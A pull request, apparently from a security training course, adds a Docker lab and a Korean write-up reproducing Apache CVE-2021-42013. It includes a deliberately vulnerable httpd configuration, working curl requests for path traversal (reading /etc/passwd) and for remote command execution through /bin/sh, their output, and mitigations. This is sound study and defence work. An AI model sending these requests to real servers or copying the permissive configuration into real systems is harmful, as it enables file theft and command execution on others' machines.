### PR TITLE
[김지우/arpe1618] Apache CVE-2021-42013 Path Traversal & RCE

### DIFF
--- a/Apache/CVE-2021-42013/Dockerfile
+++ b/Apache/CVE-2021-42013/Dockerfile
@@ -1,0 +1,14 @@
+FROM vulhub/httpd:2.4.50
+
+LABEL maintainer="phithon <root@leavesongs.com>"
+
+RUN set -ex \
+    && sed -i "s|#LoadModule cgid_module modules/mod_cgid.so|LoadModule cgid_module modules/mod_cgid.so|g" /usr/local/apache2/conf/httpd.conf \
+    && sed -i "s|#LoadModule cgi_module modules/mod_cgi.so|LoadModule cgi_module modules/mod_cgi.so|g" /usr/local/apache2/conf/httpd.conf \
+    && sed -i "s|#Include conf/extra/httpd-autoindex.conf|Include conf/extra/httpd-autoindex.conf|g" /usr/local/apache2/conf/httpd.conf \
+    && cat /usr/local/apache2/conf/httpd.conf \
+        | tr '\n' '\r' \
+        | perl -pe 's|<Directory />.*?</Directory>|<Directory />\n    AllowOverride none\n    Require all granted\n</Directory>|isg' \
+        | tr '\r' '\n' \
+        | tee /tmp/httpd.conf \
+    && mv /tmp/httpd.conf /usr/local/apache2/conf/httpd.conf

--- a/Apache/CVE-2021-42013/README.md
+++ b/Apache/CVE-2021-42013/README.md
@@ -1,0 +1,176 @@
+# Apache HTTP Server 2.4.50 경로 탈출 취약점 (CVE-2021-42013)
+
+## 요약
+
+Apache HTTP Server 2.4.50에서 CVE-2021-41773의 불완전한 패치로 인해 발생한 경로 탈출(Path Traversal) 취약점입니다.  
+`.%%32%65`(점의 이중 URL 인코딩)를 사용하여 패치를 우회할 수 있으며, 인증 없이 웹 루트 외부의 파일을 읽거나 CGI가 활성화된 경우 원격 코드 실행(RCE)까지 가능합니다.
+
+- **CVE**: CVE-2021-42013
+- **영향 버전**: Apache HTTP Server 2.4.49, 2.4.50
+
+
+## 취약 조건
+
+- Apache HTTP Server 버전 2.4.49 또는 2.4.50
+- `Require all granted` 설정으로 루트 디렉토리 접근 허용
+- RCE를 위해서는 `mod_cgi` 또는 `mod_cgid` 모듈 활성화 필요
+- `/icons/` 같은 접근 가능한 디렉토리가 존재해야 함
+
+## 환경 구성
+
+Docker와 Docker Compose가 설치되어 있어야 합니다.
+
+```bash
+git clone https://github.com/vulhub/vulhub.git
+cd vulhub/httpd/CVE-2021-42013
+docker compose up -d
+```
+
+컨테이너 실행 확인:
+
+```bash
+docker compose ps
+```
+
+`http://localhost:8080` 접속 시 `It works!` 페이지가 보이면 환경 준비 완료입니다.
+
+## 취약점 원리
+
+CVE-2021-41773 패치에서 Apache는 `%2e`(점의 URL 인코딩)를 필터링했습니다.  
+그러나 `%%32%65`처럼 이중으로 인코딩하면 필터를 우회할 수 있었습니다.
+
+```
+%%32%65 → %2e → . (점)
+```
+
+결과적으로 서버가 처리하는 실제 경로는 다음과 같습니다:
+
+```
+/icons/.%%32%65/.%%32%65/... → /icons/../../../../../../etc/passwd
+```
+
+`../`를 반복하면 웹 루트를 벗어나 서버의 어느 파일이든 접근할 수 있습니다.
+
+## 재현 절차
+
+### 1. 파일 읽기 (Path Traversal)
+
+`--path-as-is` 옵션은 curl이 URL을 자체적으로 정규화하지 않도록 합니다.
+
+```bash
+curl -v --path-as-is "http://localhost:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"
+```
+
+### 2. 원격 코드 실행 (RCE)
+
+CGI가 활성화된 경우 `/bin/sh`를 직접 실행시킬 수 있습니다.
+
+```bash
+curl -v --data "echo;id" 'http://localhost:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'
+```
+
+## 실행 결과
+
+### 파일 읽기 결과
+
+```
+* Trying [::1]:8080...
+* Established connection to localhost (::1 port 8080) from ::1 port 52900
+* using HTTP/1.x
+> GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1
+> Host: localhost:8080
+> User-Agent: curl/8.18.0
+> Accept: */*
+>
+< HTTP/1.1 200 OK
+< Server: Apache/2.4.50 (Unix)
+< Content-Length: 926
+<
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+```
+
+HTTP 200 OK와 함께 `/etc/passwd` 내용이 출력됩니다.
+
+### RCE 결과
+
+```
+* Trying [::1]:8080...
+* Established connection to localhost (::1 port 8080) from ::1 port 40872
+* using HTTP/1.x
+> POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
+> Host: localhost:8080
+> Content-Length: 7
+> Content-Type: application/x-www-form-urlencoded
+>
+< HTTP/1.1 200 OK
+< Server: Apache/2.4.50 (Unix)
+< Transfer-Encoding: chunked
+<
+uid=1(daemon) gid=1(daemon) groups=1(daemon)
+```
+
+`uid=1(daemon)`으로 서버에서 명령어가 실행됐음을 확인할 수 있습니다.
+
+## 대응 방안
+
+### 1. Apache 버전 업그레이드 (가장 중요)
+
+Apache HTTP Server 2.4.51 이상으로 업그레이드합니다.
+
+```bash
+# Ubuntu/Debian
+sudo apt update && sudo apt upgrade apache2
+
+# 버전 확인
+apache2 -v
+```
+
+### 2. 설정으로 접근 제한
+
+`httpd.conf`에서 루트 디렉토리 접근을 명시적으로 거부합니다.
+
+```apache
+<Directory />
+    AllowOverride none
+    Require all denied
+</Directory>
+```
+
+### 3. 불필요한 모듈 비활성화
+
+CGI가 필요 없다면 비활성화합니다.
+
+```bash
+# Ubuntu/Debian
+sudo a2dismod cgi cgid
+sudo systemctl restart apache2
+```
+
+### 4. 불필요한 디렉토리 별칭 제거
+
+`/icons/`, `/cgi-bin/` 같은 기본 디렉토리 별칭을 제거하거나 접근을 제한합니다.
+
+## 참고 자료
+
+- https://httpd.apache.org/security/vulnerabilities_24.html
+- https://nvd.nist.gov/vuln/detail/CVE-2021-42013
+- https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2021-42013
+

--- a/Apache/CVE-2021-42013/docker-compose.yml
+++ b/Apache/CVE-2021-42013/docker-compose.yml
@@ -1,0 +1,6 @@
+version: '2'
+services:
+ apache:
+   build: .
+   ports:
+    - "8080:80"


### PR DESCRIPTION
안녕하세요 WHS4기 13반 김지우입니다 
Apache HTTP Server 2.4.50 경로 탈출 취약점(CVE-2021-42013) 를 분석 및 재현한 보고서입니다

